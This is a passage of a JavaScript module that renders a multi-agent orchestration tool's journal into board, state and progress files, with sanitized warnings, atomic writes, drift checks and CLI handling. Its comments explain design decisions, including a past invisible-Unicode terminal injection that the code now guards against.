      if (t.review && !APPROVING_RE.test(String(t.review.verdict ?? ''))) return 'changes-requested';
      if (t.review || t.report) return 'in-review';
      if (running.length > 0) return 'in-progress';
      const deps = Array.isArray(t.deps) ? t.deps.map(String) : [];
      const unmet = deps.filter((d) => !mergedIds.has(d));
      const unknown = deps.filter((d) => !knownIds.has(d));
      if (deps.length === 0 || (unmet.length === 0 && unknown.length === 0)) return 'ready';
      return 'backlog';
    };
    const lane = laneOf();
    const deps = Array.isArray(t.deps) ? t.deps.map(String) : [];
    const annotations = [];
    if (lane === 'in-review' && t.review && APPROVING_RE.test(String(t.review.verdict ?? ''))) {
      annotations.push('approved, awaiting merge');
    }
    if (lane === 'blocked') {
      const b = blockageOn(t.id);
      if (b) annotations.push(b.detail ?? 'blocked');
      else if (t.error) annotations.push(`error: ${t.error.class ?? 'unknown'}`);
    }
    if (t.override) annotations.push(t.override.reason ?? 'set by ticket.status');
    if (lane === 'backlog') {
      for (const d of deps.filter((x) => !knownIds.has(x))) annotations.push(`dep ${d} (unknown)`);
    }
    lanes.get(lane).push({
      id: t.id,
      title: t.title,
      agents: runningByTicket.get(t.id) ?? [],
      // Everyone who ever held it, not only whoever holds it now. `agents`
      // empties the moment an agent reports, so a merged ticket carried no
      // trace of who did the work — and "who touched this" is a question
      // people ask about FINISHED tickets, never about running ones. The fold
      // has kept the list since spawns learned to name a ticket; only the
      // board dropped it.
      worked_by: sortedUnique(t.agents),
      since: t.lastTs,
      // What the agent SAID when it handed the ticket back, not only whether
      // it passed. A `changes-needed` card used to arrive with its reason
      // discarded at fold time, so the board could say a ticket had come back
      // and never why — the one thing the reader opens the card for.
      report_text: t.report?.text ?? null,
      // The two lifecycle facts the LANE could only imply. `done` said a
      // ticket was merged and never which commit; `changes-requested` said a
      // review had come back and never who wrote it. Both are in the journal
      // — `review` carries ticket/verdict/by and `merge` carries ticket/sha —
      // and neither reached the one surface people open to ask.
      review: t.review === null ? null : { verdict: t.review.verdict, by: t.review.by, ts: t.review.ts },
      merge: t.merge === null ? null : { sha: t.merge.sha, mode: t.merge.mode, ts: t.merge.ts },
      // What actually ran, in spawn order: which agent, on which model, from
      // when to when, ending in what verdict. `worked_by` answers "who
      // touched this"; this answers "what did it cost me and how did it go",
      // which is the question a finished ticket is opened for.
      execution: t.runs.map((a) => ({
        agent: a.agent,
        role: a.role,
        model: a.model,
        started: a.spawnTs,
        ended: a.reportTs,
        verdict: a.verdict,
      })),
      annotation: annotations.length > 0 ? annotations.join(' · ') : null,
    });
  }

  const agents = state.agents
    .filter((a) => a.status === 'running')
    .map((a) => {
      const signal = state.progressByAgent.get(a.agent) ?? null;
      const evidence = state.evidenceByAgent.get(a.agent) ?? null;
      // Doctor's rule, imported rather than restated (ADR-21). Nothing here
      // ever downgraded a spawn, so an agent that never reported stayed
      // `running` forever and the header counted week-old ghosts as live —
      // while doctor, reading the same journal, had been calling them
      // abandoned the whole time. Two answers, one question.
      //
      // Measured against `state.lastTs`, the journal's own latest event, so
      // this stays clock-free like the rest of `boardOf`: `board.json` is
      // byte-compared by `--check`, and a wall-clock verdict would make two
      // clones of one journal disagree. It is also the more useful meaning —
      // stale is "the initiative moved on without it", not "you looked late".
      const { ageHours, stale } = spawnStaleness(a.spawnTs, state.lastTs, staleHours);
      return {
        agent: a.agent,
        role: a.role,
        ticket: a.ticket,
        // `blocked` outranks `stale`: it is the agent's own account of why it
        // stopped, and it is what the waiting-operator tile counts. Staleness
        // is what we infer when there is no such account.
        state: signal?.state === 'blocked' ? 'blocked' : stale ? 'stale' : signal?.state ?? 'running',
        // Carried separately as well, because `state` is one slot and a
        // consumer may want the verdict without losing what the agent said.
        stale,
        open_hours: ageHours === null ? null : Math.round(ageHours * 10) / 10,
        detail: signal?.detail ?? null,
        next: signal?.next ?? null,
        last_signal: signal?.ts ?? a.spawnTs,
        // What it has SHOWN. Null until it shows something, which is the
        // ordinary state of an agent that has just started — the strip says
        // "nothing yet" rather than implying silence.
        last_evidence: evidence?.ts ?? null,
        evidence_kind: evidence?.kind ?? null,
        // When it started. An agent that has shown nothing is stale from its
        // SPAWN, not from the last thing it said — without this an agent
        // chattering every four minutes and producing nothing outranks one
        // that produced something twenty minutes ago, which is the exact
        // inversion the evidence split exists to correct.
        since: a.spawnTs,
      };
    });

  return {
    lanes,
    asks,
    agents,
    paused: pausedGate === null
      ? null
      : { kind: pausedGate.kind, result: pausedGate.result, since: pausedGate.ts ?? null },
  };
}

/** BOARD.md — the waiting queue first, then the agent strip, then the lanes. */
export function renderBoard(state, board = boardOf(state)) {
  const parts = [GENERATED_HEADER, `# BOARD — ${inline(state.initiatives)}\n\n`];
  parts.push(`**Progress:** ${progressLine(state)}\n`);
  if (board.paused !== null) {
    parts.push(`\n**PAUSED** on gate ${inline(board.paused.kind)} (${inline(board.paused.result)}) since ${inline(board.paused.since)}\n`);
  }

  parts.push('\n## Waiting on operator\n\n');
  parts.push(
    table(
      ['Question', 'Recommendation', 'Default', 'Ticket', 'Gate', 'Since'],
      board.asks.map((a) => [
        inline(a.question ?? '(no question recorded)'),
        inline(a.recommendation),
        inline(a.default),
        inline(a.ticket),
        inline(a.kind),
        inline(a.since),
      ]),
    ),
  );

  parts.push('\n## Agents\n\n');
  parts.push(
    table(
      ['Agent', 'Role', 'Ticket', 'State', 'Detail', 'Last signal'],
      sortByKey(board.agents, (a) => a.agent).map((a) => [
        inline(a.agent),
        inline(a.role),
        inline(a.ticket),
        inline(a.state),
        inline(a.detail),
        inline(a.last_signal),
      ]),
    ),
  );

  for (const lane of LANES) {
    const cards = board.lanes.get(lane);
    parts.push(`\n## ${lane} (${cards.length})\n\n`);
    parts.push(
      list(
        cards.map(
          (c) =>
            `\`${inline(c.id)}\`${c.title ? ` — ${inline(c.title)}` : ''}` +
            `${c.agents.length > 0 ? ` — ${inline(c.agents)}` : ''}` +
            `${c.annotation ? ` _(${inline(c.annotation)})_` : ''}`,
        ),
      ),
    );
  }
  return parts.join('');
}

/**
 * board.json, schema 1. Deterministic: fixed key insertion order, timestamps
 * verbatim from events, invisibles escaped as \uXXXX (round-trips through
 * JSON.parse) — silent removal is the one thing this layer refuses to do.
 */
export function boardJson(state, board = boardOf(state)) {
  const payload = {
    schema: 1,
    initiative: state.initiatives.length === 1 ? state.initiatives[0] : state.initiatives,
    progress: {
      percent: state.percent,
      merged: state.merged,
      tickets: state.ticketList.length,
      phase: state.checkpoint?.phase ?? null,
    },
    paused: board.paused,
    asks: board.asks,
    agents: sortByKey(board.agents, (a) => a.agent),
    lanes: Object.fromEntries(LANES.map((lane) => [lane, board.lanes.get(lane)])),
  };
  return jsonEscapeInvisible(JSON.stringify(payload, null, 2)) + '\n';
}

/** The one-line progress banner; also the H1 of PROGRESS.md. */
export function progressLine(state) {
  const phase = state.checkpoint?.phase ?? null;
  return `PROGRESS: ${state.percent}% · ${state.merged}/${state.ticketList.length} tickets merged · phase: ${
    phase == null || String(phase).trim() === '' ? '(none)' : inline(phase)
  }`;
}

/**
 * Warnings for stderr — surfaced, never fatal.
 *
 * STDERR IS AN OUTPUT CHANNEL, and every journal value that reaches it goes
 * through `inline()` exactly like a value reaching a document.
 *
 * That was not true until a security review demonstrated it. `ev` and
 * `init` were interpolated RAW here, and a journal carrying a right-to-left
 * override plus 18 TAG characters in those fields put 37 invisible codepoints
 * on the operator's terminal, spelling "DELETE THE JOURNAL" where nothing was
 * visible, with the override mirroring the rest of the line. Twenty-eight
 * lines below, `initiativeName()` was passing the very same `state.initiatives`
 * through `inline()` on its way into the document — the same value, sanitized
 * for the file and raw for the human, inside one function. That is the third
 * spelling of the rule reappearing as a third spelling of WHERE the rule
 * applies, which is the same defect wearing different clothes (ADR-21).
 *
 * The fuzz that should have caught it swept `STATE.md` and `PROGRESS.md`. The
 * channel it did not sweep was the one that leaked, so the fuzz now sweeps
 * every channel this module can write to.
 */
export function warnings(state) {
  const out = [];
  if (state.truncatedTail) out.push('journal has a truncated final line (crash mid-write) — it was skipped');
  if (state.corruptLines > 0) out.push(`journal has ${state.corruptLines} corrupt line(s) mid-file — they were skipped`);
  if (state.malformed > 0) out.push(`${state.malformed} line(s) parsed to a non-object value — they were skipped`);
  for (const [ev, n] of sortByKey([...state.unknownTypes.entries()], (e) => e[0])) {
    out.push(`unknown event type "${inlinePlain(ev)}" x${n} — counted but not folded (newer Tyran?)`);
  }
  // The lane the operator meant to set is NOT set, and the id they typed is the
  // only thing that can tell them why.
  for (const { ticket } of state.unknownOverrides) {
    out.push(`ticket.status for unknown ticket "${inlinePlain(ticket)}" — ignored (an override never invents a ticket)`);
  }
  for (const { ticket } of state.unknownErrorTickets) {
    out.push(`error names unknown ticket "${inlinePlain(ticket)}" — the error is recorded, but not bound to a ticket`);
  }
  if (state.initiatives.length > 1) {
    out.push(
      `journal mixes ${state.initiatives.length} initiatives: ${state.initiatives.map((i) => inlinePlain(i)).join(', ')}`,
    );
  }
  if (state.mismatchedReleases.length > 0) {
    out.push(`${state.mismatchedReleases.length} lease release(s) by a non-holder — leases stay open`);
  }
  // Never silent (ADR-19 correction 1): an event excluded from spawn/report
  // pairing is exactly the fact a reader must not have to infer from an
  // unexplained gap in the table.
  for (const { raw, problem } of state.unusableAgentNames) {
    out.push(`unusable data.agent ${inlinePlain(raw)}: ${problem} — excluded from spawn/report pairing`);
  }
  // A close that closed something is a fact about the record, not bookkeeping:
  // these agents never said how their work ended, and the checkpoint decided
  // for them. Naming them is what makes the difference between "finished" and
  // "stopped being tracked" visible after the fact.
  for (const { agent, ticket } of state.closedBySpawn) {
    out.push(
      `agent ${inlinePlain(agent)} was still open when the initiative closed${
        ticket == null ? '' : ` (ticket ${inlinePlain(ticket)})`
      } — closed by the checkpoint, with no report of its own`,
    );
  }
  // The state ADR-18 makes unrepresentable through `append`, and which the
  // projection no longer silently guesses at now that ticket-first is gone.
  for (const { agent, count } of state.ambiguousAgents) {
    out.push(
      `agent ${inlinePlain(agent)} has ${count} open spawns — the journal was hand-edited or written ` +
        'before ADR-18; spawn/report pairing for this name is ambiguous and reports pair oldest-first',
    );
  }
  return out;
}

// ------------------------------------------------------------- documents

function initiativeName(state) {
  if (state.initiatives.length === 0) return '(none)';
  return state.initiatives.map((i) => inline(i)).join(', ');
}

function renderState(state) {
  const cp = state.checkpoint;
  const parts = [GENERATED_HEADER, `\n# STATE — ${initiativeName(state)}\n`];

  parts.push('\n## Checkpoint\n\n');
  parts.push(
    list([
      `**Phase:** ${cp ? inline(cp.phase) : '_none_'}`,
      `**Checkpoint written:** ${cp ? inline(cp.ts) : '_none_'} by ${cp ? inline(cp.actor) : '_none_'}`,
      `**Last journal event:** ${state.lastEvent ? `\`${inline(state.lastEvent.ev)}\`` : '_none_'} at ${
        state.lastEvent ? inline(state.lastEvent.ts) : '_none_'
      } by ${state.lastEvent ? inline(state.lastEvent.actor) : '_none_'}`,
      `**Plan accepted:** ${state.planAccepted ? inline(state.planAccepted.ts) : '_none_'}`,
      `**Progress:** ${progressLine(state)}`,
    ]),
  );

  parts.push('\n## Agents\n\n');
  parts.push(
    table(
      ['Agent', 'Role', 'Model', 'Ticket', 'Worktree', 'Status', 'Spawned', 'Last signal'],
      sortByKey(state.agents, (a) => `${a.agent} ${a.spawnTs ?? ''}`).map((a) => {
        // A signal that outlived its report is stale by definition, and cannot
        // be read here: the report deleted it at fold time (see `closeAgent`),
        // and only running rows carry a signal at all. The filter alone was not
        // enough — a re-spawned name is running again.
        const signal = a.status === 'running' ? state.progressByAgent.get(a.agent) : null;
        return [
          inline(a.agent),
          inline(a.role),
          inline(a.model),
          inline(a.ticket),
          inline(a.worktree),
          a.status === 'running'
            ? '**running (no report yet)**'
            : `${inline(a.status)}${a.verdict == null ? '' : `: ${inline(a.verdict)}`}`,
          inline(a.spawnTs),
          signal ? `${inline(signal.state)} at ${inline(signal.ts)}` : inline(null),
        ];
      }),
    ),
  );

  parts.push('\n## Open blockages\n\n');
  parts.push(
    table(
      ['Ticket', 'Agent', 'Detail', 'Since'],
      sortByKey([...state.blockages.values()], (b) => `${b.ticket ?? ''} ${b.agent}`).map((b) => [
        inline(b.ticket),
        inline(b.agent),
        inline(b.detail),
        inline(b.ts),
      ]),
    ),
  );

  parts.push('\n## Findings\n\n');
  parts.push(
    table(
      ['Id', 'Area', 'Claim', 'Proof', 'Ticket', 'By', 'At'],
      state.findings.map((f) => [
        inline(f.id),
        inline(f.area),
        inline(f.claim),
        inline(f.proof),
        inline(f.ticket),
        inline(f.actor),
        inline(f.ts),
      ]),
    ),
  );

  parts.push('\n## Ledger\n\n');
  parts.push(
    table(
      ['Ticket', 'Title', 'Status', 'Deps', 'Agents', 'Last event'],
      state.ticketList.map((t) => [
        `\`${inline(t.id)}\`${t.declared ? '' : ' _(no ticket.created)_'}`,
        inline(t.title),
        inline(ticketStatus(t)),
        inline(t.deps),
        inline(t.agents.length === 0 ? null : t.agents),
        inline(t.lastTs),
      ]),
    ),
  );

  parts.push('\n## Open gates\n\n');
  // The Question column is what a resumed conductor reads. Without it this
  // table says THAT the initiative is waiting on the operator and never what
  // it asked, which costs a re-litigation of the question after every
  // compaction. `fold` already carries it; ordinary gates render an em dash.
  parts.push(
    table(
      ['Gate', 'Latest result', 'Question', 'At', 'Evidence'],
      sortByKey(state.openGates, (g) => g.kind).map((g) => [
        inline(g.kind),
        inline(g.result),
        inline(g.question),
        inline(g.ts),
        inline(g.evidence),
      ]),
    ),
  );

  parts.push('\n## All gates\n\n');
  // "Last refusal" is the column that makes a re-run visible. The latest
  // result wins the row, so a gate that denied and was then re-run green read
  // exactly like a gate that had never objected to anything — the one reading
  // an operator must not be given by accident.
  parts.push(
    table(
      ['Gate', 'Latest result', 'Events', 'At', 'Last refusal'],
      sortByKey([...state.gates.values()], (g) => g.kind).map((g) => [
        inline(g.kind),
        inline(g.result),
        String(g.count),
        inline(g.ts),
        g.lastRefusal == null ? inline(null) : `${inline(g.lastRefusal.result)} at ${inline(g.lastRefusal.ts)}`,
      ]),
    ),
  );

  parts.push('\n## Open leases\n\n');
  parts.push(
    table(
      ['Resource', 'Holder', 'Acquired'],
      sortByKey([...state.leases.values()], (l) => l.resource).map((l) => [
        inline(l.resource),
        inline(l.holder),
        inline(l.ts),
      ]),
    ),
  );

  parts.push('\n## Lease releases by a non-holder\n\n');
  parts.push(
    table(
      ['Resource', 'Released by', 'Actual holder', 'At'],
      state.mismatchedReleases.map((m) => [inline(m.resource), inline(m.by), inline(m.holder), inline(m.ts)]),
    ),
  );

  parts.push('\n## Decisions\n\n');
  parts.push(
    table(
      ['ID', 'Decision', 'At', 'By'],
      sortByKey(state.decisions, (d) => d.id).map((d) => [
        `\`${inline(d.id)}\``,
        inline(d.text),
        inline(d.ts),
        inline(d.actor),
      ]),
    ),
  );

  parts.push('\n## Retro entries\n\n');
  parts.push(
    table(
      ['Kind', 'Target', 'Confidence', 'At'],
      state.retro.map((r) => [inline(r.kind), inline(r.target), inline(r.confidence), inline(r.ts)]),
    ),
  );

  parts.push('\n## Errors\n\n');
  parts.push(
    table(
      ['Class', 'Detail', 'At', 'By'],
      state.errors.map((e) => [inline(e.class), inline(e.detail), inline(e.ts), inline(e.actor)]),
    ),
  );

  parts.push('\n## Resume steps\n\n');
  const steps = cp?.nextSteps;
  const stepList = Array.isArray(steps) ? steps : steps == null || steps === '' ? [] : [steps];
  parts.push(stepList.length === 0 ? '_none_\n' : stepList.map((s, i) => `${i + 1}. ${inline(s)}\n`).join(''));

  parts.push('\n## Journal integrity\n\n');
  const typeCounts = sortByKey([...state.byType.entries()], (e) => e[0]).map(
    ([ev, n]) => `\`${inline(ev)}\` ${n}`,
  );
  parts.push(
    list([
      `**Events folded:** ${state.total}`,
      `**Unknown event types:** ${state.unknownTypes.size === 0 ? '0' : inline([...state.unknownTypes.keys()].join(', '))}`,
      `**Non-object lines skipped:** ${state.malformed}`,
      `**Corrupt lines skipped:** ${state.corruptLines}`,
      `**Truncated final line:** ${state.truncatedTail ? 'yes (crash mid-write; skipped)' : 'no'}`,
      `**Timespan:** ${inline(state.firstTs)} → ${inline(state.lastTs)}`,
      `**Events by type:** ${typeCounts.length === 0 ? '_none_' : typeCounts.join(' · ')}`,
    ]),
  );
  return parts.join('');
}

function milestoneSummary(m) {
  const d = m.data ?? {};
  switch (m.ev) {
    case 'init.created':
      return inline(d.title ?? 'initiative opened');
    case 'plan.accepted':
      return inline('plan accepted');
    case 'gate':
      return `${inline(d.kind)} → ${inline(d.result)}`;
    case 'merge':
      return `${inline(d.ticket)} → ${inline(d.sha)}`;
    case 'checkpoint':
      return `phase ${inline(d.phase)}`;
    default:
      return '&mdash;';
  }
}

function renderProgress(state) {
  const parts = [GENERATED_HEADER, `\n# ${progressLine(state)}\n`];
  parts.push(`\nInitiative: **${initiativeName(state)}** · see \`${STATE_FILE}\` for the full state.\n`);

  parts.push('\n## Tickets\n\n');
  parts.push(
    state.ticketList.length === 0
      ? '_none_\n'
      : state.ticketList
          .map((t) => `- [${t.merge ? 'x' : ' '}] \`${inline(t.id)}\` — ${inline(ticketStatus(t))}${
            t.title ? ` — ${inline(t.title)}` : ''
          }\n`)
          .join(''),
  );

  parts.push('\n## Open gates\n\n');
  parts.push(
    sortByKey(state.openGates, (g) => g.kind).length === 0
      ? '_none_\n'
      : sortByKey(state.openGates, (g) => g.kind)
          .map((g) => `- **${inline(g.kind)}** — ${inline(g.result)} (${inline(g.ts)})\n`)
          .join(''),
  );

  parts.push('\n## Milestones\n\n');
  const shown = state.milestones.slice(-MAX_MILESTONES);
  const omitted = state.milestones.length - shown.length;
  if (omitted > 0) parts.push(`_${omitted} earlier milestone(s) omitted — the journal keeps them all._\n\n`);
  parts.push(
    table(
      ['When', 'Event', 'Summary'],
      shown.map((m) => [inline(m.ts), `\`${inline(m.ev)}\``, milestoneSummary(m)]),
    ),
  );
  return parts.join('');
}

/**
 * Render both projections from a journal read result.
 * Returns `{ files: { name: content }, state, warnings }`.
 */
export function renderProjections(readResult) {
  const state = fold(readResult);
  const board = boardOf(state);
  return {
    state,
    warnings: warnings(state),
    files: {
      [STATE_FILE]: renderState(state),
      [PROGRESS_FILE]: renderProgress(state),
      [BOARD_FILE]: renderBoard(state, board),
      [BOARD_JSON_FILE]: boardJson(state, board),
    },
  };
}

/** Read a journal file and render both projections. */
export function projectFile(file) {
  if (!existsSync(file)) {
    throw new IOError(`journal not found: ${resolve(file)}`);
  }
  if (statSync(file).isDirectory()) {
    throw new IOError(`journal path is a directory, not a file: ${resolve(file)}`);
  }
  return renderProjections(readJournal(file));
}

// ------------------------------------------------------------------ I/O

let tmpCounter = 0;

/** Atomic write: a concurrent reader sees the old or the new file, never half. */
export function writeAtomic(path, content) {
  const tmp = tempPathFor(path);
  try {
    writeFileSync(tmp, content, 'utf8');
    renameSync(tmp, path);
  } catch (err) {
    cleanUp(tmp);
    throw err;
  }
}

function tempPathFor(path) {
  return join(dirname(path), `.${Date.now().toString(36)}-${process.pid}-${tmpCounter++}.tmp`);
}

function cleanUp(tmp) {
  try {
    unlinkSync(tmp);
  } catch {
    /* nothing to clean up */
  }
}

/**
 * Write a set of files as close to atomically as a filesystem allows: stage
 * EVERY temp file first, then rename them all. A failure while staging (full
 * disk, no permission) therefore leaves the previous projections completely
 * untouched, instead of swapping STATE.md and then failing on PROGRESS.md.
 *
 * The pair is still not one transaction — the window shrinks to the gap
 * between two renames rather than spanning a whole document write.
 */
export function writeAllAtomic(entries) {
  const staged = [];
  try {
    for (const [path, content] of entries) {
      // The directory may not exist yet, and the first time that matters is
      // the worst time: `.tyran/state/` is created by the first initiative, so
      // `board.mjs --dir .tyran` on a freshly set-up repo — the command the
      // README leads with — died with an ENOENT naming a temp file nobody had
      // heard of. Staging into a directory is not a decision, it is what
      // writing a file there means.
      mkdirSync(dirname(path), { recursive: true });
      const tmp = tempPathFor(path);
      writeFileSync(tmp, content, 'utf8');
      staged.push([tmp, path]);
    }
  } catch (err) {
    for (const [tmp] of staged) cleanUp(tmp);
    throw err;
  }
  for (let i = 0; i < staged.length; i++) {
    try {
      renameSync(staged[i][0], staged[i][1]);
    } catch (err) {
      // A rename failing part-way leaves earlier files already swapped — that
      // window is documented. What must NOT happen is temp files piling up as
      // hidden dotfiles in .tyran/state/<init>/, invisible to --check.
      for (const [tmp] of staged.slice(i)) cleanUp(tmp);
      throw err;
    }
  }
}

/**
 * Byte-exact comparison against what is on disk. Deliberately NOT normalized:
 * whitespace, CRLF, BOM and a missing trailing newline are all drift, because
 * a hand-edited projection is exactly what `--check` exists to catch.
 */
export function checkFile(path, expected) {
  if (!existsSync(path)) return { path, ok: false, reason: 'missing on disk' };
  const actual = readFileSync(path);
  const want = Buffer.from(expected, 'utf8');
  if (actual.equals(want)) return { path, ok: true };
  const a = actual.toString('utf8').split('\n');
  const b = expected.split('\n');
  let first = null;
  let differing = 0;
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    if (a[i] !== b[i]) {
      differing++;
      if (first === null) first = i + 1;
    }
  }
  const sizes = `(on disk: ${actual.length} B, expected: ${want.length} B)`;
  return {
    path,
    ok: false,
    reason:
      differing === 0
        ? `same text, different bytes — encoding or BOM ${sizes}`
        : `${differing} of ${b.length} line(s) differ, first at line ${first} ${sizes}`,
  };
}

// ------------------------------------------------------------------- CLI

class UsageError extends Error {}
class IOError extends Error {}

const BOOLEAN_FLAGS = ['check'];
const VALUE_FLAGS = ['out-dir'];

export function parseArgs(argv) {
  const flags = {};
  const rest = [];
  for (let i = 0; i < argv.length; i++) {
    const arg = argv[i];
    if (arg.startsWith('--')) {
      const name = arg.slice(2);
      // A repeated flag silently overriding itself is how a projection ends
      // up in the wrong directory — refuse instead of guessing.
      if (name in flags) throw new Error(`flag --${name} was given twice`);
      if (BOOLEAN_FLAGS.includes(name)) {
        flags[name] = true;
      } else if (VALUE_FLAGS.includes(name)) {
        const value = argv[++i];
        if (value === undefined || value.startsWith('--')) throw new Error(`flag --${name} requires a value`);
        flags[name] = value;
      } else {
        throw new Error(`unknown flag --${name}`);
      }
    } else rest.push(arg);
  }
  if (rest.length === 0) throw new UsageError();
  if (rest.length > 1) throw new Error(`unexpected extra argument "${rest[1]}"`);
  return { journal: rest[0], outDir: flags['out-dir'], check: flags.check === true };
}

function main() {
  try {
    const { journal, outDir, check } = parseArgs(process.argv.slice(2));
    const dir = outDir ?? dirname(resolve(journal));
    const { files, state, warnings: warn } = projectFile(journal);
    for (const w of warn) console.error(`project: warning: ${w}`);

    // Zero signal, pure noise: not one event parsed, yet the file had content
    // we could not read. That is a wrong path or a non-journal file, and
    // overwriting a good STATE.md with an empty one would hand the operator a
    // false picture of the initiative under a success exit code.
    //
    // `truncatedTail` counts as damage too: readJournal classifies a final
    // line without a trailing newline as truncated rather than corrupt, so a
    // one-line file (minified JSON, a token, a single log line) would
    // otherwise walk straight through this gate. A journal whose very first
    // append died mid-write lands here as well, and that is the intended
    // reading: zero readable events plus any trace of damage means we do not
    // project.
    //
    // An EMPTY journal (no events, no damage at all) stays perfectly legal
    // and projects to empty documents; partial damage with >= 1 readable
    // event still only warns.
    if (state.total === 0 && (state.corruptLines + state.malformed > 0 || state.truncatedTail)) {
      // Only report damage that actually occurred: "0 corrupt line(s),
      // 0 non-object line(s)" next to a refusal reads like a contradiction.
      const damage = [
        state.corruptLines > 0 ? `${state.corruptLines} corrupt line(s)` : null,
        state.malformed > 0 ? `${state.malformed} non-object line(s)` : null,
        state.truncatedTail ? 'a truncated final line' : null,
      ].filter(Boolean);
      throw new IOError(
        `this does not look like a journal: 0 readable events, ` +
          `${damage.join(', ')} — refusing to overwrite projections in ${dir}`,
      );
    }

    if (check) {
      const results = Object.entries(files).map(([name, content]) => checkFile(join(dir, name), content));
      const drifted = results.filter((r) => !r.ok);
      if (drifted.length === 0) {
        console.log(`projections up to date (${results.length} files in ${dir})`);
        return;
      }
      for (const r of drifted) console.error(`project: drift: ${r.path} — ${r.reason}`);
      console.error(`project: regenerate with: node scripts/project.mjs ${journal} --out-dir ${dir}`);
      process.exit(1);
    }

    mkdirSync(dir, { recursive: true });
    writeAllAtomic(Object.entries(files).map(([name, content]) => [join(dir, name), content]));
    for (const [name, content] of Object.entries(files)) {
      const path = join(dir, name);
      console.log(`wrote ${path} (${Buffer.byteLength(content, 'utf8')} B)`);
    }
  } catch (err) {
    if (err instanceof UsageError) {
      console.error('usage: project.mjs <journal.jsonl> [--out-dir <dir>] [--check]');
      process.exit(2);
    }
    console.error(`project: ${err.message}`);
    // An unexpected internal failure must not masquerade as a usage error:
    // print the stack so the bug is reportable, then still fail loudly.
    if (!(err instanceof IOError) && !(err instanceof Error && err.constructor === Error)) {
      console.error(err.stack);
    }
    process.exit(2);
  }
}

/**
 * Canonical absolute path, falling back to the merely-resolved one when the
 * path cannot be canonicalized.
 *
 * The fallback is load-bearing, and NOT for `node --eval`: there argv[1] is
 * undefined and the caller returns before ever reaching this. It is for the
 * cases where argv[1] names something realpath cannot follow — the script
 * directory was renamed or deleted after launch, a parent component is an
 * unreadable directory (EACCES), or a launcher/shim rewrote argv[1] to a
 * logical name that was never a real file. Without the fallback the guard
 * throws ENOENT out of module scope and the tool dies at startup, which is a
 * different bug, not a fix.
 */
function canonicalPath(path) {
  const abs = resolve(path);
  try {
    return realpathSync(abs);
  } catch {
    return abs;
  }
}

/**
 * True when this module is the program's entry point.
 *
 * BOTH sides must be canonicalized. `import.meta.url` already names the real
 * file — Node resolves module specifiers through symlinks — while
 * `process.argv[1]` is whatever the caller typed. Comparing them raw turned
 * every invocation through a symlinked path into a SILENT no-op under exit 0:
 * `main()` never ran, no projection was written, nothing said so. That is not
 * theoretical — `/tmp` and `/var` are symlinks on macOS, and plugin installs
 * routinely reach `scripts/` through one.
 *
 * Deliberately duplicated in journal.mjs rather than shared: this is boot
 * boilerplate, not a domain rule. ADR-18 is about one RULE having one
 * implementation (see pairSpawns), which this is not — and the difference is
 * visible in what DID get shared: the invisibility rule moved to
 * scripts/invisible.mjs because three copies of it had drifted apart, while
 * these eight lines have no semantics to drift.
 */
function isMainModule(moduleUrl) {
  if (!process.argv[1]) return false;
  return canonicalPath(process.argv[1]) === canonicalPath(fileURLToPath(moduleUrl));
}

if (isMainModule(import.meta.url)) main();
